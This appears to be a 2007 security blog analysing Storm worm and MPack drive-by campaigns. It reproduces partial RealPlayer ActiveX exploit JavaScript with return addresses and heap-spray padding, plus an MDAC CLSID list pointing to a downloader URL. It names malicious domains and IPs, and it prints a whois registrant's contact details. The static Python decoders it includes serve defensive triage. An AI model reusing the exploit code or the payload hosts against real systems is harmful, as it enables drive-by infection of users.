Wednesday, December 05, 2007

QuickTime and RealPlayer Exploits

We're seeing lots of reports about QuickTime and RealPlayer exploits in the wild. Other security vendors are privately reporting in excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded JavaScript. Of course, users may never even know they've been infected.

Here is a partial snip of one exploit in human-readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....

(removed some content)
.....
PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade their third-party applications. Please remember to apply all security patches for those as frequently as (or more frequently than) Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!


Wednesday, November 07, 2007

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…
function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}
…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.
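The two snippets on this page (the RealPlayer function in the December post and the startMDAC() CLSID array just above) are easier to triage without ever running them. The following is an added example of static triage helpers, not code from the original post or from any tool it mentions: it folds split string chains like "IER" + "PCtl.I" back into one literal, decodes unescape("%xx") calls into raw bytes, and lists every CLSID the script carries. The two sample strings are copied from the snippets on this page; the helper names are this example's own.

```python
"""Static triage helpers for obfuscated exploit-kit JavaScript (added example).

Nothing here executes the script. It folds "a" + "b" string chains into one
literal, decodes unescape("%xx...") literals into bytes, and lists the CLSIDs
an ActiveX-spraying function like startMDAC() carries. The two samples are
copied from the snippets in the posts on this page; helper names are ours.
"""
import re

# Lines from the RealPlayer snippet in the December post (copied, not constructed).
REAL_SNIPPET = r'''
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
Real = new ActiveXObject(VulObject);
JmpOver = unescape("%75%06%74%04");
ret = unescape("%7f%a5%60");
ret = unescape("%4f%71%a4%60");
ret = unescape("%63%11%08%60");
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
'''

# The CLSID array from startMDAC() in the November post (copied, not constructed).
MDAC_SNIPPET = """
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
 '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}',
 '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
 '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
 '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}',
 '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
 '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
"""

CONCAT_RE = re.compile(r'"[^"]*"(?:\s*\+\s*"[^"]*")+')        # "a" + "b" + "c"
LITERAL_RE = re.compile(r'"([^"]*)"')
UNESCAPE_RE = re.compile(r'unescape\("((?:%[0-9A-Fa-f]{2})+)"\)')
CLSID_RE = re.compile(r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}')


def fold_concats(js):
    """Rewrite every '"a" + "b" + "c"' chain as the single literal '"abc"'."""
    return CONCAT_RE.sub(
        lambda m: '"' + "".join(LITERAL_RE.findall(m.group(0))) + '"', js)


def activex_progids(js):
    """ProgIDs handed to new ActiveXObject(...), resolving one level of var = "..."."""
    folded = fold_concats(js)
    assigns = dict(re.findall(r'(\w+)\s*=\s*"([^"]*)"', folded))
    progids = []
    for arg in re.findall(r'new\s+ActiveXObject\(\s*([^)]+?)\s*\)', folded):
        progids.append(arg.strip('"') if arg.startswith('"') else assigns.get(arg, arg))
    return progids


def decode_unescapes(js):
    """Raw bytes behind each unescape("%xx%xx...") literal, in source order."""
    return [bytes.fromhex(m.replace("%", "")) for m in UNESCAPE_RE.findall(js)]


def extract_clsids(js):
    """Every distinct CLSID in the script, upper-cased and sorted."""
    return sorted({c.upper() for c in CLSID_RE.findall(js)})


def triage(js):
    """One-shot summary an analyst can compare against known-bad indicators."""
    return {
        "progids": activex_progids(js),
        "unescaped_hex": [b.hex() for b in decode_unescapes(js)],
        "clsids": extract_clsids(js),
    }


if __name__ == "__main__":
    for name, sample in (("RealPlayer", REAL_SNIPPET), ("startMDAC", MDAC_SNIPPET)):
        print(name, triage(sample))
```

Run on the RealPlayer lines it reports the ProgID IERPCtl.IERPCtl.1 and the four byte strings hidden behind unescape(); run on the startMDAC array it reports thirteen distinct CLSIDs, which is the kind of list worth feeding into a kill-bit review or a web proxy rule. Because it is regex-based it will miss literals built with charCode tricks or nested evaluation, so treat it as a first pass, not a replacement for sandboxed execution.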

There has been no change in the social engineering vectors, but the attempts to hide their exploit in layered JavaScript are new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.


Friday, September 28, 2007

Stormworm - iframe hell.

This morning we started receiving dual language Storm worm Emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс
(Translation: Look what they're writing about you, you bitch, everybody look! Here's the address)
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet resolve (404 error); however, there is an index page, and it has JavaScript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4


The sid=1, sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php


sid=4 is a JavaScript-encoded page that tries to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php returns nothing but PHP errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an mpack that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fast-flux, yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.


Wednesday, September 19, 2007

Mpack Decode Requests

I've seen quite a rise in JavaScript decoding questions on different mailing lists. This evening one from DShield was waiting in my email box.

Turns out Dan needed to figure out what this code does:

<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';
s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';
s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';
s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';
s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}
if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}
nbsp();</script><!-- c4 -->


I'm sure the Internet Storm Center (ISC) handlers get hundreds of requests like this every month. Using methods like those listed here: http://handlers.sans.org/dwesemann/decode/ I was able to turn that code into human-readable form:

</textatea></textarea><IFRAME src="http:// marcobernardoni. com /x /index.php" width=3 height=3 style="display:none"></IFRAME>
(Spaces added to protect from accidental clicks)
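The decode loop above is simple enough to reproduce statically, which avoids handing the script to a browser at all. The following is an added example, not code from the original post or from the ISC handlers' page it links to: a Python re-implementation of the nbsp() loop. Every three digits are one character code, and a code above 191 gets 848 added, because unescape(0x08)+unescape(0x30) concatenates the strings "8" and "48" rather than adding numbers; 848 is exactly the distance from the windows-1251 Cyrillic bytes 0xC0-0xFF to U+0410-U+044F, so the same decoder also handles Russian-language landing pages. ENCODED is the payload string from the post; the function names are this example's own.

```python
"""Static decoder for the digit-triple obfuscation used by nbsp() (added example).

Re-implements the JavaScript decode loop in Python instead of running it:
three digits = one character code; codes above 191 get 848 added (the
unescape(0x08)+unescape(0x30) trick yields the string "848"), which maps
windows-1251 Cyrillic bytes 0xC0-0xFF onto U+0410-U+044F.
"""
import re

# The obfuscated payload from the post, with the five literals joined back together.
ENCODED = (
    "060047116101120116097116101097062060047116101120116097114101097062"
    "060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111"
    "110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104"
    "116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069"
    "062032"
)

SHIFT_ABOVE = 191   # (t - unescape(0xBF)) > unescape(0x00)  means  t > 191
SHIFT = 848         # unescape(0x08) + unescape(0x30) is the string "848", so t -= -"848"


def decode_triples(s):
    """Mirror the nbsp() loop exactly: consume three chars at a time while i < len-1."""
    out = []
    i, length = 0, len(s)
    while i < length - 1:
        t = s[i:i + 3]          # charAt() past the end yields "", so a 2-digit tail is still decoded
        i += 3
        code = int(t)
        if code > SHIFT_ABOVE:
            code += SHIFT
        out.append(chr(code))
    return "".join(out)


def iframe_sources(html):
    """Pull src= values out of the decoded markup so the next hop can be blocked."""
    return re.findall(r'src="([^"]*)"', html, flags=re.IGNORECASE)


if __name__ == "__main__":
    decoded = decode_triples(ENCODED)
    print(decoded)
    print("iframe targets:", iframe_sources(decoded))
    # Constructed check of the +848 branch: windows-1251 0xC0 (192) decodes to Cyrillic 'А'.
    print(decode_triples("192"), hex(ord(decode_triples("192"))))
```

The decoded string is the same </textatea></textarea><IFRAME ...> markup shown above, and iframe_sources() hands back the single URL to add to a proxy block list. Mirroring the loop condition rather than simply chunking the string matters: the original tolerates a trailing two-digit group, and a decoder that silently drops it would miss the last character of a differently sized payload.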

The stray HTML closing tags at the front are there to evade techniques like the one described by Tom Liston here: http://isc.sans.org/diary.html?storyid=2268

marcobernardoni.com is running on an IP out of Hong Kong, and the index page listed has an MPack JavaScript which attempts several exploits to push file.php. Of course it's a Windows PE binary; however, it seems to be broken.

Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Status: clientTransferProhibited
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008

Registrant:
FuzioN FuzioN fuzka@bk.ru +7.9015371916
FuzioN inc
/dev/null
Moskow,babruysk,RU 117625


Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 58.65.234.161

Protect yourself: turn off JavaScript completely, or only allow it for certain sites using the Firefox NoScript plugin, and keep your application patches up to date!
